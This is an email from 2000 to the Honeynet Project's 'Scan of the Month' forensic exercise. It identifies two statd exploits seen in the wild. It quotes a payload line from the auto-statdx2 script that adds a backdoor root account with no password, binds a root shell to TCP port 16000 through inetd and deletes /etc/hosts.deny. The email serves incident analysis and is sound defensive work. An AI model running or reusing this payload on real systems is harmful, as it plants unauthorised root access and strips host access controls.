From bwoodfield@home.com Tue Dec 12 18:43:04 2000
Date: Tue, 12 Dec 2000 15:55:15 -0800
From: Brent Woodfield <bwoodfield@home.com>
To: project@honeynet.org
Subject: Scan of the Month


I'll tell you exactly what those two were. One was bobek v2 and the other
was an auto-statdx2 script.  I've seen them out in the wild too, but I
believe the hackers are still calling it "ohday". 

I was able to retreive this line of code from that auto-statd script:

sprintf(slogin,"echo deamon:x:5000:5000:/user:/tmp:/bin/bash >> /etc/passwd;
echo deamon:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow;
echo iftp::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow; echo
iftp:x:0:0::/root:/bin/bash >> /etc/passwd; pwconv;echo 16000 stream tcp
nowait root /usr/sbin/tcpd /bin/sh >> /etc/inetd.conf;rm -rf
/etc/hosts.deny;killall -HUP inetd;");

the original version was named statdx2. I believe you can find it on
http://packetstorm.securify.com  With that line amoung a couple other
alterations, both of those exploits can be put into a simple script to auto
comprimise computers and save them in a log file.

Hope it helps.